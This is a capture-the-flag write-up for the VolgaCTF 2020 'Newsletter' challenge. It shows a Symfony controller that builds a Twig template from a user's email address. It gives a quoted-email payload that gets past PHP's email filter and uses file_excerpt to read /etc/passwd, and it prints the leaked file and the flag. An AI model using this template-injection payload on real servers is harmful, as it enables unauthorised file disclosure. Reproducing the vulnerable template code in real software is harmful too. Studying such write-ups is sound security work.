Newsletter
[web]
newsletter
Subscribe to our newsletter!
Recon
We are provided the following source code:
<?php
namespace App\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\Mailer\MailerInterface;
use Symfony\Component\Mime\Email;
class MainController extends AbstractController
{
public function index(Request $request)
{
return $this->render('main.twig');
}
public function subscribe(Request $request, MailerInterface $mailer)
{
$msg = '';
$email = filter_var($request->request->get('email', ''), FILTER_VALIDATE_EMAIL);
if($email !== FALSE) {
$name = substr($email, 0, strpos($email, '@'));
$content = $this->get('twig')->createTemplate(
"<p>Hello ${name}.</p><p>Thank you for subscribing to our newsletter.</p><p>Regards, VolgaCTF Team</p>"
)->render();
$mail = (new Email())->from('newsletter@newsletter.q.2020.volgactf.ru')->to($email)->subject('VolgaCTF Newsletter')->html($content);
$mailer->send($mail);
$msg = 'Success';
} else {
$msg = 'Invalid email';
}
return $this->render('main.twig', ['msg' => $msg]);
}
public function source()
{
return new Response('<pre>'.htmlspecialchars(file_get_contents(__FILE__)).'</pre>');
}
}
Which is from a PHP web application using the Symfony framework.
The challenge website allows us to submit an email address, it'll send an email:
We can input user+{{2+4}}@mydomain.tld to get Twig template injection:
Twig template injection
We look at PayloadAllTheThings for some inspiration.
But we also have to deal with PHP's FILTER_VALIDATE_EMAIL as per source code:
$email = filter_var($request->request->get('email', ''), FILTER_VALIDATE_EMAIL);
There is a 72 (or 62) character limit.
Thankfully it's PHP, so there's usually a way to break things :)
In this case by using: "user+{{}}"@mydomain.tld
Exploit
"user+{{'../../../../../etc/passwd'|file_excerpt(0,-1)}}"@mydomain.tld
The email we receive:
<p>Hello "user+</p><ol start="1"><li><a name="line1"></a><code>root:x:0:0:root:/root:/bin/bash</code></li>
<li><a name="line2"></a><code>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</code></li>
<li><a name="line3"></a><code>bin:x:2:2:bin:/bin:/usr/sbin/nologin</code></li>
<li><a name="line4"></a><code>sys:x:3:3:sys:/dev:/usr/sbin/nologin</code></li>
<li><a name="line5"></a><code>sync:x:4:65534:sync:/bin:/bin/sync</code></li>
<li><a name="line6"></a><code>games:x:5:60:games:/usr/games:/usr/sbin/nologin</code></li>
<li><a name="line7"></a><code>man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</code></li>
<li><a name="line8"></a><code>lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</code></li>
<li><a name="line9"></a><code>mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</code></li>
<li><a name="line10"></a><code>news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</code></li>
<li><a name="line11"></a><code>uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</code></li>
<li><a name="line12"></a><code>proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</code></li>
<li><a name="line13"></a><code>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</code></li>
<li><a name="line14"></a><code>backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</code></li>
<li><a name="line15"></a><code>list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</code></li>
<li><a name="line16"></a><code>irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</code></li>
<li><a name="line17"></a><code>gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</code></li>
<li><a name="line18"></a><code>nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</code></li>
<li><a name="line19"></a><code>systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin</code></li>
<li><a name="line20"></a><code>systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin</code></li>
<li><a name="line21"></a><code>syslog:x:102:106::/home/syslog:/usr/sbin/nologin</code></li>
<li><a name="line22"></a><code>messagebus:x:103:107::/nonexistent:/usr/sbin/nologin</code></li>
<li><a name="line23"></a><code>_apt:x:104:65534::/nonexistent:/usr/sbin/nologin</code></li>
<li><a name="line24"></a><code>lxd:x:105:65534::/var/lib/lxd/:/bin/false</code></li>
<li><a name="line25"></a><code>uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin</code></li>
<li><a name="line26"></a><code>dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin</code></li>
<li><a name="line27"></a><code>landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin</code></li>
<li><a name="line28"></a><code>sshd:x:109:65534::/run/sshd:/usr/sbin/nologin</code></li>
<li><a name="line29"></a><code>pollinate:x:110:1::/var/cache/pollinate:/bin/false</code></li>
<li><a name="line30"></a><code>postfix:x:111:116::/var/spool/postfix:/usr/sbin/nologin</code></li>
<li><a name="line31"></a><code>flag:x:1000:1000:VolgaCTF_6751602deea2a308ab611eeef7a4e961:/home/flag:/bin/false</code></li>
<li><a name="line32"></a><code></code></li></ol>".<p></p><p>Thank you for subscribing to our newsletter.</p><p>Regards, VolgaCTF Team</p>
Flag
VolgaCTF_6751602deea2a308ab611eeef7a4e961